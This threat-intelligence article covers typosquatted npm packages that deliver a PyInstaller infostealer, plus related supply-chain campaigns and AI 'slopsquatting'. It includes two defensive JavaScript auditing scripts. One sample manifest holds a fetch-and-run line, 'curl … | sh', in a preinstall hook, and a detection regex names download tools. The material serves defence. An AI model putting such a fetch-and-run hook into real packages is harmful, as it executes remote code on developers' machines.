Mallory

Malicious npm Packages Distribute PyInstaller Infostealer via Typosquatting and Fake CAPTCHA

package-repository-poisoning, dependency-confusion-typosquat, credential-stealer-activity, loader-delivery-mechanism, defense-evasion-method
Updated March 21, 2026 at 03:34 PM. 4 sources.

Ten malicious packages were discovered on the npm registry, masquerading as popular JavaScript libraries through typosquatting. The packages, with names such as typescriptjs, deezcord.js, and react-router-dom.js, were designed to trick developers into installing them by mimicking legitimate projects. Upon installation, a postinstall script executed a heavily obfuscated loader that first printed a fake CAPTCHA prompt in the terminal to appear legitimate, then downloaded and ran a 24 MB infostealer built with PyInstaller. The malware targeted Windows, Linux, and macOS systems, stealing credentials from system keyrings, browsers, and authentication services. The campaign went undetected for an extended period and accumulated nearly 10,000 downloads before being reported to npm; the malicious packages were still available at the time of reporting.

The infostealer's deployment leveraged multiple layers of obfuscation, including self-decoding wrappers, XOR decryption, and control-flow obfuscation, to evade static analysis and detection. The attack highlights the ongoing risks posed by supply chain threats in open-source ecosystems, particularly through typosquatting and social engineering tactics. Security researchers emphasized the importance of vigilance when installing npm packages and recommended enhanced scrutiny of package names and sources to mitigate the risk of inadvertently installing malicious software.
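The three package names the story cites (typescriptjs, deezcord.js, react-router-dom.js) each derive from a real name by appending a "js" suffix or by swapping or doubling a letter. The script below is an added example, not code from the article or from the researchers it cites: it reduces a dependency name to a canonical form (scope, separators, a trailing "js" and doubled letters removed) and compares it by edit distance against a short list of well-known packages. The POPULAR list, the distance thresholds and the SAMPLE_DEPS object are assumptions made for the demonstration.

```javascript
// Added example, not code from the article or the researchers it cites.
// Scores dependency names against a list of well-known packages to catch the
// naming patterns the story describes: an appended "js"/".js", a dropped or
// swapped letter, or a doubled letter.

// Constructed sample of popular names; a real check would use a much larger
// list (e.g. the registry's most-downloaded packages) plus your own allowlist.
const POPULAR = ['typescript', 'discord.js', 'react-router-dom', 'ethers', 'nodemon', 'express', 'lodash'];

// Levenshtein edit distance computed with a single rolling row.
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0]; // value of the cell up-left of row[j]
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Canonical form used for comparison: lower case, scope removed, separators
// removed, a trailing "js" dropped, runs of the same letter collapsed.
function normalize(name) {
  let n = name.toLowerCase().replace(/^@[^/]+\//, '');
  n = n.replace(/[-_.]/g, '');
  if (n.length > 4 && n.endsWith('js')) n = n.slice(0, -2);
  return n.replace(/(.)\1+/g, '$1');
}

function checkName(name, popular = POPULAR) {
  if (popular.includes(name)) return { name, verdict: 'known', match: name, distance: 0 };
  const n = normalize(name);
  let best = null;
  for (const p of popular) {
    const d = editDistance(n, normalize(p));
    if (best === null || d < best.distance) best = { match: p, distance: d };
  }
  if (!best) return { name, verdict: 'unknown', match: null, distance: null };
  const threshold = n.length < 5 ? 1 : 2; // tighter for very short names
  let verdict = 'unknown';
  if (best.distance === 0) verdict = 'lookalike'; // same canonical name, different package
  else if (best.distance <= threshold) verdict = 'suspicious';
  return { name, verdict, match: verdict === 'unknown' ? null : best.match, distance: best.distance };
}

// Returns only the entries worth a human look.
function auditDependencies(deps, popular = POPULAR) {
  return Object.keys(deps)
    .map((name) => checkName(name, popular))
    .filter((r) => r.verdict === 'lookalike' || r.verdict === 'suspicious');
}

// Constructed dependencies object: the three names from the story plus two
// legitimate ones for contrast.
const SAMPLE_DEPS = {
  typescriptjs: '^5.0.0',
  'deezcord.js': '^14.0.0',
  'react-router-dom.js': '^6.0.0',
  express: '^4.19.0',
  'left-pad': '^1.3.0',
};

for (const r of auditDependencies(SAMPLE_DEPS)) {
  console.log(`${r.verdict}: ${r.name} resembles ${r.match} (distance ${r.distance})`);
}
```

Run it over the dependencies object of a package.json before the first install. A lookalike verdict (identical canonical name, different package) is a hard stop; a suspicious verdict is a prompt to compare the registry page, maintainer and publish history with the package you actually meant to install.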

Timeline

  1. Oct 29, 2025

    Researchers disclose cross-platform npm infostealer campaign details

    Security reporting revealed that the malicious packages fetched a PyInstaller-based infostealer and in some cases used fake CAPTCHA-style social engineering to trigger execution. The disclosures identified the campaign as a cross-platform supply-chain threat affecting developer environments.

  2. Oct 29, 2025

    Ten typosquatted npm packages are published with credential-stealing code

    Attackers uploaded 10 malicious npm packages masquerading as legitimate libraries in a typosquatting campaign. The packages targeted developers on Windows, macOS, and Linux and were designed to steal credentials and other sensitive data.


Related Stories

Malicious npm Packages Stealing Developer Credentials Across Platforms

Security researchers have uncovered multiple campaigns involving malicious npm packages designed to steal developer credentials and sensitive information from Windows, macOS, and Linux systems. In one operation, ten typosquatted packages impersonated popular libraries such as TypeScript, discord.js, ethers.js, and others, using sophisticated obfuscation, fake CAPTCHA prompts, and postinstall hooks to deploy an information stealer that harvested credentials from system keyrings, browsers, and authentication services. The malware executed in a new terminal window to evade detection and sent stolen data, including IP addresses, to external servers. Another large-scale campaign, dubbed 'PhantomRaven,' involved 126 npm packages and over 86,000 downloads, targeting authentication tokens, CI/CD secrets, and GitHub credentials. These packages leveraged remote dynamic dependencies to fetch and execute payloads during installation, profiling infected devices and exfiltrating secrets for potential supply chain attacks. The attackers employed techniques such as slopsquatting, where AI-generated package recommendations led developers to install non-existent, malicious packages. Some packages impersonated tools from GitLab and Apache, and many remained available on npm at the time of reporting. The campaigns highlight the ongoing risks in the npm ecosystem, with attackers exploiting both user trust and platform weaknesses to compromise developer environments and CI/CD pipelines. Security experts warn that the theft of tokens and credentials could enable further attacks, including the introduction of malicious code into legitimate projects and broader supply chain compromises.

1 month ago
Malicious and Credential-Stealing npm Packages Target Developers via Obfuscation and Typosquatting

Multiple malicious npm packages have been discovered targeting developers by employing advanced obfuscation techniques and typosquatting to mimic popular legitimate packages such as *TypeScript*, *discord.js*, *ethers.js*, *nodemon*, and *Claude Code*. Security researchers revealed that these packages use up to four layers of obfuscation—including eval wrapping, XOR encryption, URL encoding, and control flow manipulation—to evade static analysis and conceal credential-stealing malware. The attack chain often begins with deceptive tactics, such as displaying fake CAPTCHAs, and proceeds to exfiltrate sensitive information like IP addresses and credentials to attacker-controlled servers. In one notable case, a package impersonating the official Anthropic CLI was found to proxy commands and data back to the threat actor, enabling both credential theft and remote command execution. These incidents highlight the persistent risks posed by weak validation and oversight in the npm ecosystem, allowing threat actors to publish lookalike packages that are difficult to distinguish from legitimate ones. The sophisticated payloads not only target local developer environments but can also compromise CI/CD pipelines, amplifying the potential impact. Security experts emphasize the need for improved package metadata validation and greater vigilance among developers to mitigate the risk of supply chain attacks through open-source dependencies.

1 month ago
Malicious npm Packages Using Typosquatting and Payload Obfuscation

Threat researchers reported an **npm supply-chain attack** in which a typosquatted package (`buildrunner-dev`) delivered **Pulsar RAT** via a multi-stage Windows infection chain. The package executed a script that fetched a large, heavily obfuscated batch file (`packageloader.bat`) containing mostly “noise” to evade static detection, performed security-product checks (including **ESET**, **Malwarebytes**, and **F-Secure**), established persistence by copying itself as `protect.bat` into a hidden folder, and attempted privilege escalation/UAC bypass using `fodhelper.exe`. Separate supply-chain reporting highlighted how package-name deception is evolving beyond human typos into **“slopsquatting”** (AI/hallucination squatting), where attackers register package names that LLMs commonly invent and then rely on developers installing them on AI recommendation. Documented tradecraft includes malicious `postinstall` scripts to exfiltrate secrets from developer environments (API keys, cloud tokens, npm auth tokens) and the use of URL-based dependencies to fetch external payloads at install time, allowing the published package to appear benign to naive scanners.

1 month ago
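The two install-time patterns described across these stories, a postinstall or preinstall hook that runs code during `npm install` and a dependency specifier that points at a URL or git remote instead of a registry release, are both visible in package metadata before anything executes. The script below is an added example, not tooling from the article or from the researchers it cites; it audits package.json-style manifests for those two signals. LIFECYCLE_HOOKS, the two regular expressions and the SAMPLE_MANIFESTS fixtures are assumptions made for the demonstration.

```javascript
// Added example, not code from the article or the researchers it cites.
// Audits package.json-style manifests for two install-time signals described
// in the story: lifecycle scripts that execute during `npm install`, and
// dependency specifiers that resolve to a URL, git remote or local path rather
// than to a versioned registry release.

// npm runs these hooks automatically at install time (prepare also runs when a
// dependency is installed from git).
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Specifiers npm resolves outside the registry: http(s) tarballs, git URLs,
// hosted-git shorthand (github:user/repo, or bare user/repo), file: and paths.
const REMOTE_SPEC =
  /^(https?:\/\/|git(\+\w+)?:|git@|github:|gitlab:|bitbucket:|gist:|file:|\.{0,2}\/|[\w.-]+\/[\w.-]+(#|$))/;

// Commands that typically fetch or decode a second stage inside a hook.
// Heuristic only: review every flagged hook, not just the ones matching this.
const SHELL_FETCH = /\b(curl|wget|Invoke-WebRequest|iwr)\b|\bnode\s+-e\b|base64/i;

function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] === 'string') {
      findings.push({
        pkg: manifest.name,
        kind: 'lifecycle-script',
        hook,
        command: scripts[hook],
        downloads: SHELL_FETCH.test(scripts[hook]),
      });
    }
  }
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [dep, spec] of Object.entries(manifest[field] || {})) {
      if (typeof spec === 'string' && REMOTE_SPEC.test(spec)) {
        findings.push({ pkg: manifest.name, kind: 'remote-dependency', field, dep, spec });
      }
    }
  }
  return findings;
}

function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests (not real packages); example.invalid is a
// reserved name that never resolves.
const SAMPLE_MANIFESTS = [
  { name: 'clean-lib', version: '1.0.0', dependencies: { lodash: '^4.17.21' } },
  {
    name: 'hooked-lib',
    version: '0.0.1',
    scripts: { postinstall: 'node loader.js' },
    dependencies: { helper: 'https://example.invalid/helper.tgz' },
  },
  {
    name: 'fetching-lib',
    version: '2.3.4',
    scripts: { preinstall: 'curl -s https://example.invalid/setup.sh | sh' },
    devDependencies: { tooling: 'github:someuser/somerepo' },
  },
];

for (const f of auditAll(SAMPLE_MANIFESTS)) {
  console.log(JSON.stringify(f));
}
```

In practice, feed it every package.json under node_modules after a dry-run install, or the manifests fetched from the registry for each entry in the lockfile. Because the campaigns above launched their payload from an install hook, installing with npm's ignore-scripts option (`npm ci --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`) and only re-enabling hooks you have reviewed blocks the install-time execution path they relied on.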
